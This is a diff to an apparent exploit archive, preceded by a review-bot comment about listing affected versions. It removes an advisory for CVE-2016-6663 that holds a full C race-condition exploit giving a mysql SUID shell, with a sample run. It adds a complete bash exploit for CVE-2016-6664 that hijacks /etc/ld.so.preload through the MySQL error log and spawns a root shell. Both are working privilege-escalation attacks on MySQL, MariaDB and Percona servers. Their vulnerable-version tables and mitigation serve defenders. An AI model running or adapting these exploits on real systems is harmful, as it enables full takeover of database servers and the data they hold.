/dev/null 
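Review bot: The header comment of the new `40678.c` gives the CVE ids and the build command but not which releases are affected, and this commit deletes `40678.txt`, which carried that table, so the entry now depends on the external advisory link for it. A defender reading the file to decide whether a host needs upgrading should find the ranges in the header. I would add a short block taken from the removed advisory, e.g. `Affected: MySQL <= 5.5.51, <= 5.6.32, <= 5.7.14; MariaDB < 5.5.52, < 10.0.28, < 10.1.18`, together with the Percona Server and XtraDB Cluster ranges listed there. The precondition stated in the same advisory also belongs in that block: a local account with CREATE/INSERT/SELECT grants on the database.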
@@ -1,765 +0,0 @@ -============================================= -- Release date: 01.11.2016 -- Discovered by: Dawid Golunski -- Severity: Critical -- CVE-2016-6663 / OCVE-2016-5616 -- http://legalhackers.com -============================================= - - -I. VULNERABILITY -------------------------- - -MySQL / MariaDB / PerconaDB - Privilege Escalation / Race Condition - - -MariaDB - < 5.5.52 - < 10.1.18 - < 10.0.28 - -MySQL - <= 5.5.51 - <= 5.6.32 - <= 5.7.14 - -Percona Server - < 5.5.51-38.2 - < 5.6.32-78-1 - < 5.7.14-8 - -Percona XtraDB Cluster - < 5.6.32-25.17 - < 5.7.14-26.17 - < 5.5.41-37.0 - - -II. BACKGROUND -------------------------- - - -MySQL: - -"MySQL is the world's most popular open source database. -Whether you are a fast growing web property, technology ISV or large -enterprise, MySQL can cost-effectively help you deliver high performance, -scalable database applications." - -"Many of the world's largest and fastest-growing organizations including -Facebook, Google, Adobe, Alcatel Lucent and Zappos rely on MySQL to save time -and money powering their high-volume Web sites, business-critical systems and -packaged software." - -http://www.mysql.com/products/ -http://www.mysql.com/why-mysql/ - --- - -MariaDB: - -"MariaDB is one of the most popular database servers in the world. -It’s made by the original developers of MySQL and guaranteed to stay open source. -Notable users include Wikipedia, WordPress.com and Google. - -MariaDB turns data into structured information in a wide array of applications, -ranging from banking to websites. It is an enhanced, drop-in replacement for MySQL. -MariaDB is used because it is fast, scalable and robust, with a rich ecosystem of -storage engines, plugins and many other tools make it very versatile for a wide -variety of use cases." 
- -https://mariadb.org/about/ - --- - -PerconaDB: - -"Percona Server for MySQL® is a free, fully compatible, enhanced, open source -drop-in replacement for MySQL that provides superior performance, scalability -and instrumentation. -With over 3,000,000 downloads, Percona Server’s self-tuning algorithms and support -for extremely high-performance hardware delivers excellent performance and reliability." - -https://www.percona.com/software/mysql-database/percona-server - - -III. INTRODUCTION -------------------------- - -An independent research has revealed a race condition vulnerability which is -present in MySQl, MariaDB and PerconaDB databases. - -The vulnerability can allow a local system user with access to the affected -database in the context of a low-privileged account (CREATE/INSERT/SELECT grants) -to escalate their privileges and execute arbitrary code as the database system -user (typically 'mysql'). - -Successful exploitation would allow an attacker to gain access to all of the -databases stored on the affected database server. - -The obtained level of access upon the exploitation, could be chained with -the other privilege escalation vulnerabilities discovered by the author of -this advisory (CVE-2016-6662 and CVE-2016-6664) to further escalate privileges -from mysql user to root user and thus allow attackers to fully compromise the -target server. - - -IV. DESCRIPTION -------------------------- - - -Table locations -~~~~~~~~~~~~~~~~~~ - -MySQL-based databases allow users with CREATE table privilege to optionally -specify a disk path of the directory where the table will be stored via a DATA -DIRECTORY parameter in the CREATE statement. - -Users who have access to a database account with CREATE grant could create a -table under a directory that they can control. 
For example: - -attacker@debian:~$ mkdir /tmp/disktable -attacker@debian:~$ chmod 777 /tmp/disktable/ -attacker@debian:~$ ls -ld /tmp/disktable/ -drwxrwxrwx 2 attacker attacker 4096 Oct 28 10:53 /tmp/disktable/ - -A user could then place a table within the directory with the following SQL -statement: - -mysql> CREATE TABLE poctab1 (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/disktable'; - -which would result in creating the following table file: - -attacker@debian:~$ ls -l /tmp/disktable/ -total 0 --rw-rw---- 1 mysql mysql 0 Oct 28 10:53 poctab1.MYD - - -Race Condition -~~~~~~~~~~~~~~~~~~ - -Observing file operations performed on the table stored within the directory, -it was discovered that REPAIR TABLE SQL statement which is available to -low-privileged users with SELECT/CREATE/INSERT grants, performed unsafe -operations on temporary files created during the table repair process. - -Executing the statement: - -mysql> REPAIR TABLE `poctab1`; -+----------------+--------+----------+----------+ -| Table | Op | Msg_type | Msg_text | -+----------------+--------+----------+----------+ -| testdb.poctab1 | repair | status | OK | -+----------------+--------+----------+----------+ - -would result in execution of the following system calls: - -[pid 1463] lstat("/tmp/disktable/poctab1.MYD", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0 -[pid 1463] open("/tmp/disktable/poctab1.MYD", O_RDWR) = 65 -[pid 1463] access("./testdb/poctab1.TRG", F_OK) = -1 ENOENT (No such file or directory) -[pid 1463] lseek(65, 0, SEEK_CUR) = 0 -[pid 1463] lseek(65, 0, SEEK_END) = 0 -[pid 1463] mprotect(0x7f6a3804f000, 12288, PROT_READ|PROT_WRITE) = 0 -[pid 1463] open("/tmp/disktable/poctab1.TMD", O_RDWR|O_CREAT|O_EXCL|O_TRUNC, 0660) = 66 -[pid 1463] lseek(65, 0, SEEK_END) = 0 -[pid 1463] lseek(64, 0, SEEK_END) = 1024 -[pid 1463] close(65) = 0 -[pid 1463] close(66) = 0 -[pid 1463] lstat("/tmp", {st_mode=S_IFDIR|S_ISVTX|0777, st_size=4096, ...}) = 0 -[pid 1463] lstat("/tmp/disktable", 
{st_mode=S_IFDIR|0777, st_size=4096, ...}) = 0 -[pid 1463] lstat("/tmp/disktable/poctab1.MYD", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0 -[pid 1463] stat("/tmp/disktable/poctab1.MYD", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0 -[pid 1463] chmod("/tmp/disktable/poctab1.TMD", 0660) = 0 -[pid 1463] chown("/tmp/disktable/poctab1.TMD", 110, 115) = 0 -[pid 1463] unlink("/tmp/disktable/poctab1.MYD") = 0 -[pid 1463] rename("/tmp/disktable/poctab1.TMD", "/tmp/disktable/poctab1.MYD") = 0 - - -The first call: - -[pid 1463] lstat("/tmp/disktable/poctab1.MYD", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0 - -was found to check file permissions of poctab1.MYD table which are then copied with chmod() -to the newly created poctab1.TMD temporary file containing the repaired table. - -The code is vulnerable to Race Condition between the call: - -[pid 1463] lstat("/tmp/disktable/poctab1.MYD", {st_mode=S_IFREG|0660, st_size=0, ...}) = 0 - -and - -[pid 1463] chmod("/tmp/disktable/poctab1.TMD", 0660) = 0 - - -If an attacker managed to unlink the temporary table poctab1.TMD and replace it -with a symlink to /var/lib/mysql before the chmod() operation (i.e. win the race), -they would be able to apply arbitrary permissions on the data directory. -The attacker would be able to control the set of permissions by pre-setting them on -poctab1.MYD file before executing the REPAIR TABLE statement. -For example, by setting the permissions of poctab1.MYD to 777 the data directory -would become readable and writable to the attacker. - - -Obtaining mysql-suid shell -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - -Apart from gaining access to arbitrary mysql files, the attacker could also -achieve arbitrary code execution in the context of mysql user (mysql shell). 
- -This could be done by first pre-setting permissions on poctab1.MYD to 04777 -(suid), and winning the race so that the permissions get applied on a copy -of a bash shell file through the vulnerable chmod() call effectively creating -a shell that elevates their permissions after execution. - -There is only one problem. Their suid shell would remain to be owned by the -attacker's user id and not 'mysql' user. - -To elevate their privileges, attacker would need to copy the bash shell to a -mysql-owned table file which are owned by mysql user. However mysql table -files are not writable by other users making it impossible for attacker to save -the shell. - -This could be bypassed if attacker created a specially crafted directory -with a group sticky bit and then created a second table named 'poctab2' as -follows: - -attacker@debian:/tmp/disktable$ chmod g+s /tmp/disktable/ -attacker@debian:/tmp/disktable$ ls -ld /tmp/disktable/ -drwxrwsrwx 2 attacker attacker 4096 Oct 28 11:25 /tmp/disktable/ - -mysql> CREATE TABLE poctab2 (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/disktable'; -Query OK, 0 rows affected (0.00 sec) - -attacker@debian:/tmp/disktable$ ls -l /tmp/disktable/ -total 0 --rw-rw---- 1 mysql mysql 0 Oct 28 11:04 poctab1.MYD --rw-rw---- 1 mysql attacker 0 Oct 28 11:34 poctab2.MYD - -As we can see poctab2.MYD table (thanks to the sticky bit (+s) on the permissions -of the group on disktable directory) has 'mysql' as the owner but 'attacker' -as the group. -Therefore, the attacker would now be able to copy /bin/bash to poctab2.MYD file -and preserve the file owner. - -Finally, they could exploit the Race Condition again and have SUID + exec -permissions applied on poctab2.MYD which would then allow them to execute the suid -shell with elevated privileges of the mysql user. 
- - -From mysql to root -~~~~~~~~~~~~~~~~~~~~~~~~ - -After obtaining a mysql suid shell, attackers could then exploit one of the -other MySQL vulnerabilities discovered by the author of this advisory: - -CVE-2016-6662 -or -CVE-2016-6664 (OCVE-2016-5617) - -to escalate their privileges from mysql user to root system user. - - - - -V. PROOF OF CONCEPT EXPLOIT -------------------------- - - -------------------[ mysql-privesc-race.c ]-------------------- - -/* - -MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit -mysql-privesc-race.c (ver. 1.0) - -CVE-2016-6663 / OCVE-2016-5616 - -Discovered/Coded by: - -Dawid Golunski - -dawid[at]legalhackers.com -@dawid_golunski -http://legalhackers.com - - -Compile: -gcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient - -Note: -* On RedHat-based systems you might need to change /tmp to another public directory - -* For testing purposes only. Do no harm. - -Full advisory URL: -http://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html - -*/ - - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - - -#define EXP_PATH "/tmp/mysql_privesc_exploit" -#define EXP_DIRN "mysql_privesc_exploit" -#define MYSQL_TAB_FILE EXP_PATH "/exploit_table.MYD" -#define MYSQL_TEMP_FILE EXP_PATH "/exploit_table.TMD" - -#define SUID_SHELL EXP_PATH "/mysql_suid_shell.MYD" - -#define MAX_DELAY 1000 // can be used in the race to adjust the timing if necessary - -MYSQL *conn; // DB handles -MYSQL_RES *res; -MYSQL_ROW row; - -unsigned long cnt; - - -void intro() { - -printf( - "\033[94m\n" - "MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit\n" - "mysql-privesc-race.c (ver. 1.0)\n\n" - "CVE-2016-6663 / OCVE-2016-5616\n\n" - "For testing purposes only. 
Do no harm.\n\n" - "Discovered/Coded by:\n\n" - "Dawid Golunski \n" - "http://legalhackers.com" - "\033[0m\n\n"); - -} - -void usage(char *argv0) { - intro(); - printf("Usage:\n\n%s user pass db_host database\n\n", argv0); -} - -void mysql_cmd(char *sql_cmd, int silent) { - - if (!silent) { - printf("%s \n", sql_cmd); - } - if (mysql_query(conn, sql_cmd)) { - fprintf(stderr, "%s\n", mysql_error(conn)); - exit(1); - } - res = mysql_store_result(conn); - if (res>0) mysql_free_result(res); - -} - - -int main(int argc,char **argv) -{ - - int randomnum = 0; - int io_notified = 0; - int myd_handle; - int wpid; - int is_shell_suid=0; - pid_t pid; - int status; - struct stat st; - /* io notify */ - int fd; - int ret; - char buf[4096] __attribute__((aligned(8))); - int num_read; - struct inotify_event *event; - /* credentials */ - char *user = argv[1]; - char *password = argv[2]; - char *db_host = argv[3]; - char *database = argv[4]; - - - // Disable buffering of stdout - setvbuf(stdout, NULL, _IONBF, 0); - - // Get the params - if (argc!=5) { - usage(argv[0]); - exit(1); - } - intro(); - // Show initial privileges - printf("\n[+] Starting the exploit as: \n"); - system("id"); - - // Connect to the database server with provided credentials - printf("\n[+] Connecting to the database `%s` as %s@%s\n", database, user, db_host); - conn = mysql_init(NULL); - if (!mysql_real_connect(conn, db_host, user, password, database, 0, NULL, 0)) { - fprintf(stderr, "%s\n", mysql_error(conn)); - exit(1); - } - - // Prepare tmp dir - printf("\n[+] Creating exploit temp directory %s\n", "/tmp/" EXP_DIRN); - umask(000); - system("rm -rf /tmp/" EXP_DIRN " && mkdir /tmp/" EXP_DIRN); - system("chmod g+s /tmp/" EXP_DIRN ); - - // Prepare exploit tables :) - printf("\n[+] Creating mysql tables \n\n"); - mysql_cmd("DROP TABLE IF EXISTS exploit_table", 0); - mysql_cmd("DROP TABLE IF EXISTS mysql_suid_shell", 0); - mysql_cmd("CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data 
directory '" EXP_PATH "'", 0); - mysql_cmd("CREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '" EXP_PATH "'", 0); - - // Copy /bin/bash into the mysql_suid_shell.MYD mysql table file - // The file should be owned by mysql:attacker thanks to the sticky bit on the table directory - printf("\n[+] Copying bash into the mysql_suid_shell table.\n After the exploitation the following file/table will be assigned SUID and executable bits : \n"); - system("cp /bin/bash " SUID_SHELL); - system("ls -l " SUID_SHELL); - - // Use inotify to get the timing right - fd = inotify_init(); - if (fd < 0) { - printf("failed to inotify_init\n"); - return -1; - } - ret = inotify_add_watch(fd, EXP_PATH, IN_CREATE | IN_CLOSE); - - - /* Race loop until the mysql_suid_shell.MYD table file gets assigned SUID+exec perms */ - - printf("\n[+] Entering the race loop... Hang in there...\n"); - - while ( is_shell_suid != 1 ) { - - cnt++; - if ( (cnt % 100) == 0 ) { - printf("->"); - //fflush(stdout); - } - - /* Create empty file , remove if already exists */ - unlink(MYSQL_TEMP_FILE); - unlink(MYSQL_TAB_FILE); - mysql_cmd("DROP TABLE IF EXISTS exploit_table", 1); - mysql_cmd("CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '" EXP_PATH "'", 1); - - /* random num if needed */ - srand ( time(NULL) ); - randomnum = ( rand() % MAX_DELAY ); - - // Fork, to run the query asynchronously and have time to replace table file (MYD) with a symlink - pid = fork(); - if (pid < 0) { - fprintf(stderr, "Fork failed :(\n"); - } - - /* Child process - executes REPAIR TABLE SQL statement */ - if (pid == 0) { - usleep(500); - unlink(MYSQL_TEMP_FILE); - mysql_cmd("REPAIR TABLE exploit_table EXTENDED", 1); - // child stops here - exit(0); - } - - /* Parent process - aims to replace the temp .tmd table with a symlink before chmod */ - if (pid > 0 ) { - io_notified = 0; - - while (1) { - int processed = 0; - ret = read(fd, buf, sizeof(buf)); - if (ret < 0) { - 
break; - } - while (processed < ret) { - event = (struct inotify_event *)(buf + processed); - if (event->mask & IN_CLOSE) { - if (!strcmp(event->name, "exploit_table.TMD")) { - //usleep(randomnum); - - // Set the .MYD permissions to suid+exec before they get copied to the .TMD file - unlink(MYSQL_TAB_FILE); - myd_handle = open(MYSQL_TAB_FILE, O_CREAT, 0777); - close(myd_handle); - chmod(MYSQL_TAB_FILE, 04777); - - // Replace the temp .TMD file with a symlink to the target sh binary to get suid+exec - unlink(MYSQL_TEMP_FILE); - symlink(SUID_SHELL, MYSQL_TEMP_FILE); - io_notified=1; - } - } - processed += sizeof(struct inotify_event); - } - if (io_notified) { - break; - } - } - - - waitpid(pid, &status, 0); - } - - // Check if SUID bit was set at the end of this attempt - if ( lstat(SUID_SHELL, &st) == 0 ) { - if (st.st_mode & S_ISUID) { - is_shell_suid = 1; - } - } - - } - - printf("\n\n[+] \033[94mBingo! Race won (took %lu tries) !\033[0m Check out the \033[94mmysql SUID shell\033[0m: \n\n", cnt); - system("ls -l " SUID_SHELL); - - printf("\n[+] Spawning the \033[94mmysql SUID shell\033[0m now... \n Remember that from there you can gain \033[1;31mroot\033[0m with vuln \033[1;31mCVE-2016-6662\033[0m or \033[1;31mCVE-2016-6664\033[0m :)\n\n"); - system(SUID_SHELL " -p -i "); - //system(SUID_SHELL " -p -c '/bin/bash -i -p'"); - - /* close MySQL connection and exit */ - printf("\n[+] Job done. Exiting\n\n"); - mysql_close(conn); - return 0; - -} - - -------------------[ EOF ]-------------------- - - - -Example run: -~~~~~~~~~~~~~~ - -attacker@xenial:~/mysql-exploit$ lsb_release -a -No LSB modules are available. 
-Distributor ID: Ubuntu -Description: Ubuntu 16.04.1 LTS -Release: 16.04 -Codename: xenial - -attacker@xenial:~/mysql-exploit$ dpkg -l | grep -i mariadb-serv -ii mariadb-server 10.0.27-0ubuntu0.16.04.1 all MariaDB database server (metapackage depending on the latest version) -ii mariadb-server-10.0 10.0.27-0ubuntu0.16.04.1 amd64 MariaDB database server binaries -ii mariadb-server-core-10.0 10.0.27-0ubuntu0.16.04.1 amd64 MariaDB database core server files - -attacker@xenial:~/mysql-exploit$ id -uid=1001(attacker) gid=1001(attacker) groups=1001(attacker) - -attacker@xenial:~/mysql-exploit$ mysql -uattacker -ppocsql -hlocalhost pocdb -e 'show grants;' -+-----------------------------------------------------------------------------------------------------------------+ -| Grants for attacker@localhost | -+-----------------------------------------------------------------------------------------------------------------+ -| GRANT USAGE ON *.* TO 'attacker'@'localhost' IDENTIFIED BY PASSWORD '*3CC3900C7B2B0A885AB128894FC10949340A09CC' | -| GRANT SELECT, INSERT, CREATE, DROP ON `pocdb`.* TO 'attacker'@'localhost' | -+-----------------------------------------------------------------------------------------------------------------+ - -attacker@xenial:~/mysql-exploit$ ls -l /var/lib/mysql/mysql/user.* -ls: cannot access '/var/lib/mysql/mysql/user.*': Permission denied - -attacker@xenial:~/mysql-exploit$ time ./mysql-privesc-race attacker pocsql localhost pocdb - -MySQL/PerconaDB/MariaDB - Privilege Escalation / Race Condition PoC Exploit -mysql-privesc-race.c (ver. 1.0) - -CVE-2016-6663 / OCVE-2016-5616 - -For testing purposes only. Do no harm. 
- -Discovered/Coded by: - -Dawid Golunski -http://legalhackers.com - - -[+] Starting the exploit as: -uid=1001(attacker) gid=1001(attacker) groups=1001(attacker) - -[+] Connecting to the database `pocdb` as attacker@localhost - -[+] Creating exploit temp directory /tmp/mysql_privesc_exploit - -[+] Creating mysql tables - -DROP TABLE IF EXISTS exploit_table -DROP TABLE IF EXISTS mysql_suid_shell -CREATE TABLE exploit_table (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit' -CREATE TABLE mysql_suid_shell (txt varchar(50)) engine = 'MyISAM' data directory '/tmp/mysql_privesc_exploit' - -[+] Copying bash into the mysql_suid_shell table. After the exploitation the following file/table will be assigned SUID and executable bits : --rw-rw---- 1 mysql attacker 1037528 Nov 1 02:33 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD - -[+] Entering the race loop... Hang in there... - - -[+] Bingo! Race won (took 5 tries) ! Check out the mysql SUID shell: - --rwsrwxrwx 1 mysql attacker 1037528 Nov 1 02:33 /tmp/mysql_privesc_exploit/mysql_suid_shell.MYD - -[+] Spawning the mysql SUID shell now... - Remember that from there you can gain root with vuln CVE-2016-6662 or CVE-2016-6664 :) - -mysql_suid_shell.MYD-4.3$ whoami -mysql -mysql_suid_shell.MYD-4.3$ id -uid=1001(attacker) gid=1001(attacker) euid=107(mysql) groups=1001(attacker) -mysql_suid_shell.MYD-4.3$ ls -l /var/lib/mysql/mysql/user.* --rw-rw---- 1 mysql mysql 2879 Oct 29 14:23 /var/lib/mysql/mysql/user.frm --rw-rw---- 1 mysql mysql 168 Oct 29 22:35 /var/lib/mysql/mysql/user.MYD --rw-rw---- 1 mysql mysql 4096 Oct 30 00:11 /var/lib/mysql/mysql/user.MYI -mysql_suid_shell.MYD-4.3$ exit -exit - -[+] Job done. Exiting - - -real 0m28.999s -user 0m0.016s -sys 0m0.016s - - - - -Video PoC: -~~~~~~~~~~~~ -http://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html - - - -VI. 
BUSINESS IMPACT -------------------------- - -Malicious local users with DB access granted a common set of privileges -(SELECT/INSERT/CREATE) could exploit this vulnerability to execute arbitrary -code and escalate their privileges to mysql system user. This would allow them -to gain access to all of the databases stored on the server as well as exploit -CVE-2016-6662 or CVE-2016-6664 vulnerabilities to further elevate privileges -to root system user (rootshell) and fully compromise the target server. - -This vulnerability could for example be exploited by malicious users in a shared -hosting environment where each user is supposed to have access to only one -database assigned to them. -It could also be exploited by attackers who have managed to find a vulnerability -in a website and gained access to the target system as a low-privileged user -(such as apache/www-data). - - -VII. SYSTEMS AFFECTED -------------------------- - -MariaDB - < 5.5.52 - < 10.1.18 - < 10.0.28 - -MySQL - <= 5.5.51 - <= 5.6.32 - <= 5.7.14 - -Percona Server - < 5.5.51-38.2 - < 5.6.32-78-1 - < 5.7.14-8 - -Percona XtraDB Cluster - < 5.6.32-25.17 - < 5.7.14-26.17 - < 5.5.41-37.0 - - - -When checking if your system contains the patches, note that this vulnerability -has been known under two CVE IDs: - -CVE-2016-6663 -CVE-2016-5616 - -CVE-2016-6663 is the original CVE that was agreed to be used by all the -affected vendors. -The issue was however mentioned in Oracle CPU mistakenly under a new CVE of -CVE-2016-5616, resulting in a duplicate. Oracle has informed that CPU will be -updated to state that CVE-2016-5616 is equivalent to CVE-2016-6663. - - -VIII. SOLUTION -------------------------- - -MariaDB/MySQL/PerconaDB vendors have received a copy of this advisory in -advance which allowed them to produce patches for this vulnerability before -disclosure. - -Update to security releases issued by the vendor. 
- -As a temporary mitigation, you can disable symbolic link support in the -database server configuration with the following my.cnf config setting: - -symbolic-links = 0 - -Nevertheless, an update to a patched release is recommended. - - -IX. REFERENCES -------------------------- - -http://legalhackers.com - -This advisory (CVE-2016-6663 / OCVE-2016-5616): -http://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html - -Exploit (mysql-privesc-race.c) source code URL: -http://legalhackers.com/exploits/mysql-privesc-race.c - -Video PoC: -http://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html - -Advisory for CVE-2016-6664 / OCVE-2016-5617: -http://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html - - -Vendor updates: - -http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html#AppendixMSQL -http://www.mysql.com/ - -https://mariadb.org/about/ -https://mariadb.com/kb/en/mdb-5552-rn/ -https://mariadb.com/kb/en/mdb-10118-rn/ -https://mariadb.com/kb/en/mdb-10028-rn/ - -https://www.percona.com/software - - -X. CREDITS -------------------------- - -The vulnerability has been discovered by Dawid Golunski -dawid (at) legalhackers (dot) com - -http://legalhackers.com - - -XI. REVISION HISTORY -------------------------- - -01.11.2016 - Advisory released - - -XII. LEGAL NOTICES -------------------------- - -The information contained within this advisory is supplied "as-is" with -no warranties or guarantees of fitness of use or otherwise. I accept no -responsibility for any damage caused by the use or misuse of this information. \ No newline at end of file diff --git a/platforms/linux/local/40679.sh b/platforms/linux/local/40679.sh new file mode 100755 index 000000000..5ce1a6d44 --- /dev/null +++ b/platforms/linux/local/40679.sh 
@@ -0,0 +1,206 @@ +#!/bin/bash -p +# +# Source: https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html // http://legalhackers.com/exploits/CVE-2016-6664/mysql-chowned.sh +# +# MySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit +# mysql-chowned.sh (ver. 1.0) +# +# CVE-2016-6664 / OCVE-2016-5617 +# +# Discovered and coded by: +# +# Dawid Golunski +# dawid[at]legalhackers.com +# +# https://legalhackers.com +# +# Follow https://twitter.com/dawid_golunski for updates on this advisory. +# +# This PoC exploit allows attackers to (instantly) escalate their privileges +# from mysql system account to root through unsafe error log handling. +# The exploit requires that file-based logging has been configured (default). +# To confirm that syslog logging has not been enabled instead use: +# grep -r syslog /etc/mysql +# which should return no results. +# +# This exploit can be chained with the following vulnerability: +# CVE-2016-6663 / OCVE-2016-5616 +# which allows attackers to gain access to mysql system account (mysql shell). +# +# In case database server has been configured with syslog you may also use: +# CVE-2016-6662 as an alternative to this exploit. +# +# Usage: +# ./mysql-chowned.sh path_to_error.log +# +# +# See the full advisory for details at: +# https://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html +# +# Video PoC: +# https://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html +# +# +# Disclaimer: +# For testing purposes only. Do no harm. +# + +BACKDOORSH="/bin/bash" +BACKDOORPATH="/tmp/mysqlrootsh" +PRIVESCLIB="/tmp/privesclib.so" +PRIVESCSRC="/tmp/privesclib.c" +SUIDBIN="/usr/bin/sudo" + +function cleanexit { + # Cleanup + echo -e "\n[+] Cleaning up..." 
+ rm -f $PRIVESCSRC + rm -f $PRIVESCLIB + rm -f $ERRORLOG + touch $ERRORLOG + if [ -f /etc/ld.so.preload ]; then + echo -n > /etc/ld.so.preload + fi + echo -e "\n[+] Job done. Exiting with code $1 \n" + exit $1 +} + +function ctrl_c() { + echo -e "\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation." + cleanexit 0 +} + +#intro +echo -e "\033[94m \nMySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit \nmysql-chowned.sh (ver. 1.0)\n\nCVE-2016-6664 / OCVE-2016-5617\n" +echo -e "Discovered and coded by: \n\nDawid Golunski \nhttp://legalhackers.com \033[0m" + +# Args +if [ $# -lt 1 ]; then + echo -e "\n[!] Exploit usage: \n\n$0 path_to_error.log \n" + echo -e "It seems that this server uses: `ps aux | grep mysql | awk -F'log-error=' '{ print $2 }' | cut -d' ' -f1 | grep '/'`\n" + exit 3 +fi + +# Priv check + +echo -e "\n[+] Starting the exploit as \n\033[94m`id`\033[0m" +id | grep -q mysql +if [ $? -ne 0 ]; then + echo -e "\n[!] You need to execute the exploit as mysql user! Exiting.\n" + exit 3 +fi + +# Set target paths +ERRORLOG="$1" +if [ ! -f $ERRORLOG ]; then + echo -e "\n[!] The specified MySQL catalina.out log ($ERRORLOG) doesn't exist. Try again.\n" + exit 3 +fi +echo -e "\n[+] Target MySQL log file set to $ERRORLOG" + +# [ Active exploitation ] + +trap ctrl_c INT +# Compile privesc preload library +echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)" +cat <<_solibeof_>$PRIVESCSRC +#define _GNU_SOURCE +#include +#include +#include +#include + #include + #include + #include + +uid_t geteuid(void) { + static uid_t (*old_geteuid)(); + old_geteuid = dlsym(RTLD_NEXT, "geteuid"); + if ( old_geteuid() == 0 ) { + chown("$BACKDOORPATH", 0, 0); + chmod("$BACKDOORPATH", 04777); + //unlink("/etc/ld.so.preload"); + } + return old_geteuid(); +} +_solibeof_ +/bin/bash -c "gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl" +if [ $? -ne 0 ]; then + echo -e "\n[!] 
Failed to compile the privesc lib $PRIVESCSRC." + cleanexit 2; +fi + + +# Prepare backdoor shell +cp $BACKDOORSH $BACKDOORPATH +echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`" + +# Safety check +if [ -f /etc/ld.so.preload ]; then + echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety." + exit 2 +fi + +# Symlink the log file to /etc +rm -f $ERRORLOG && ln -s /etc/ld.so.preload $ERRORLOG +if [ $? -ne 0 ]; then + echo -e "\n[!] Couldn't remove the $ERRORLOG file or create a symlink." + cleanexit 3 +fi +echo -e "\n[+] Symlink created at: \n`ls -l $ERRORLOG`" + +# Wait for MySQL to re-open the logs +echo -ne "\n[+] Waiting for MySQL to re-open the logs/MySQL service restart...\n" +read -p "Do you want to kill mysqld process to instantly get root? :) ? [y/n] " THE_ANSWER +if [ "$THE_ANSWER" = "y" ]; then + echo -e "Got it. Executing 'killall mysqld' now..." + killall mysqld +fi +while :; do + sleep 0.1 + if [ -f /etc/ld.so.preload ]; then + echo $PRIVESCLIB > /etc/ld.so.preload + rm -f $ERRORLOG + break; + fi +done + +# /etc/ dir should be owned by mysql user at this point +# Inject the privesc.so shared library to escalate privileges +echo $PRIVESCLIB > /etc/ld.so.preload +echo -e "\n[+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: \n`ls -l /etc/ld.so.preload`" +echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload" +echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`" +chmod 755 /etc/ld.so.preload + +# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo) +echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!" +sudo 2>/dev/null >/dev/null + +#while :; do +# sleep 0.1 +# ps aux | grep mysqld | grep -q 'log-error' +# if [ $? -eq 0 ]; then +# break; +# fi +#done + +# Check for the rootshell +ls -l $BACKDOORPATH +ls -l $BACKDOORPATH | grep rws | grep -q root +if [ $? 
-eq 0 ]; then + echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`" + echo -e "\n\033[94mGot root! The database server has been ch-OWNED !\033[0m" +else + echo -e "\n[!] Failed to get root" + cleanexit 2 +fi + + +# Execute the rootshell +echo -e "\n[+] Spawning the rootshell $BACKDOORPATH now! \n" +$BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB" +$BACKDOORPATH -p + +# Job done. +cleanexit 0 diff --git a/platforms/linux/local/40679.txt b/platforms/linux/local/40679.txt deleted file mode 100755 index 2fb8105b7..000000000 --- a/platforms/linux/local/40679.txt +++ /dev/null 
